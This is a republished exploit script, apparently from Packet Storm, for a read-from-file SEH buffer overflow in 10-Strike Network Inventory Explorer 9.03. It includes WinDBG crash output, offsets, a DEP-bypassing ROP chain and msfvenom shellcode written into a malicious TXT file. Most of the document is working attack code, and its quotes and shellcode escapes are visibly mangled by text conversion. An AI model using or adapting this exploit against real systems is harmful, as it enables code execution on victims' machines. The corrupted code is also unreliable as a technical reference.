10-Strike Network Inventory Explorer 9.03 Buffer Overflow ≈ Packet Storm


#!/usr/bin/python

# Exploit Title: 10-Strike Network Inventory Explorer – Read-from-file Buffer Overflow (SEH)(ROP)
# Version: 9.03
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Date: 2020-03-30
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.10-strike.com
# Tested on: Win8.1 x64 – Build 9600

# Description:
# – Exploits the functionality to load a list of computers from a file
# – Some DLL’s and the main EXE don’t rebase, which allowed for some instruction reusage for ROP
# – Used a jump after ROP to go to a buffer for more space

# Reproduction:
# – Run the script, a TXT file will be generated
# – Open the program and click on tab « Computers »
# – Click the button « From Text File » and select the generated TXT file
# – Clck OK and check results

# WinDBG initial crash output:
# (f54.f48): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:Program Files (x86)10-Strike Network Inventory ExplorerNetworkInventoryExplorer.exe
# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203
# NetworkInventoryExplorer+0x2b47:
# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (f54.f48): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
# 41414141 ?? ???

import sys, struct

filename = « poc_10_strike_nie.txt »

# Maximum length
maxlen = 5000

# Offsets
crash_esi = 2145 # Initial space until ESI buffer filling
crash_seh = 217 # SEH
crash_nseh = crash_seh – 4 # NSEH
landingpad = 310 # Space for RET NOP landingpad after stackpivoting

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b « x0ax0dx00x5cx3a » exitfunc=thread
# Payload size: 220 bytes
shellcode = b » »
shellcode += b »xdaxdbxd9x74x24xf4x5fx2bxc9xbdx06″
shellcode += b »xa7x5dx4bxb1x31x83xefxfcx31x6fx14″
shellcode += b »x03x6fx12x45xa8xb7xf2x0bx53x48x02″
shellcode += b »x6cxddxadx33xacxb9xa6x63x1cxc9xeb »
shellcode += b »x8fxd7x9fx1fx04x95x37x2fxadx10x6e »
shellcode += b »x1ex2ex08x52x01xacx53x87xe1x8dx9b »
shellcode += b »xdaxe0xcaxc6x17xb0x83x8dx8ax25xa0″
shellcode += b »xd8x16xcdxfaxcdx1ex32x4axefx0fxe5″
shellcode += b »xc1xb6x8fx07x06xc3x99x1fx4bxeex50″
shellcode += b »xabxbfx84x62x7dx8ex65xc8x40x3fx94″
shellcode += b »x10x84x87x47x67xfcxf4xfax70x3bx87″
shellcode += b »x20xf4xd8x2fxa2xaex04xcex67x28xce »
shellcode += b »xdcxccx3ex88xc0xd3x93xa2xfcx58x12″
shellcode += b »x65x75x1ax31xa1xdexf8x58xf0xbaxaf »
shellcode += b »x65xe2x65x0fxc0x68x8bx44x79x33xc1″
shellcode += b »x9bx0fx49xa7x9cx0fx52x97xf4x3exd9″
shellcode += b »x78x82xbex08x3dx6cx5dx99x4bx05xf8″
shellcode += b »x48xf6x48xfbxa6x34x75x78x43xc4x82″
shellcode += b »x60x26xc1xcfx26xdaxbbx40xc3xdcx68″
shellcode += b »x60xc6xbexefxf2x8ax6ex8ax72x28x6f »

# ROP chain
def create_rop_chain():
# rop chain generated with mona.py – www.corelan.be
rop_gadgets = [
0x7c344efe, # POP EDX # RETN [MSVCR71.dll]
0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe]
0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe]
0x61e7555f, # POP EBP # RETN [sqlite3.dll]
0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll]
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]
0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe]
0xffffffff, #
0x61e0579d, # INC EBX # RETN [sqlite3.dll]
0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe]
0x7c3458e6, # POP EDX # RETN [MSVCR71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]
0x7c369c4a, # POP ECX # RETN [MSVCR71.dll]
0x7c38dfd7, # &Writable location [MSVCR71.dll]
0x7c34a40e, # POP EDI # RETN [MSVCR71.dll]
0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe]
0x90909090, # nop
0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe]
]
return  ».join(struct.pack(‘<I’, _) for _ in rop_gadgets)
rop_chain = create_rop_chain()

# NOPPING
retnop = struct.pack(« <L », 0x61e0103e) # RET # sqlite3.dll
prenop = « x90 » * 200 # Pre NOP’s after jumping back in stack, sledding until shellcode
postnop = « x90 » * 16 # Post NOP’s after running ROP chain to disable DEP

# Jump back on stack for payload space
jmpback = « xe9x9fxf9xffxff » # jmp 0xfffff9a4 # Jump back on stack for more space

# Prefix
prefix = « A » * crash_nseh # Junk until NSEH
nseh = « B » * 4 # Junk again, no use for NSEH
seh = struct.pack(« <L », 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot
suffix = prenop # Prenopping until shellcode
suffix += shellcode # Magic!
suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled
suffix += rop_chain # Disable DEP
suffix += postnop # Old school NOP-sledding
suffix += jmpback # Jump! Just like van Halen
suffix += « C » * (maxlen – len(prefix + nseh + seh + suffix)) # Junk for filling

# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together

try:
file = open(filename, »wb »)
file.write(payload)
file.close()
print « [+] File  » + filename +  » with size  » + str(len(payload)) +  » created successfully »
except:
print « [!] Error creating file! »
sys.exit(0)



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *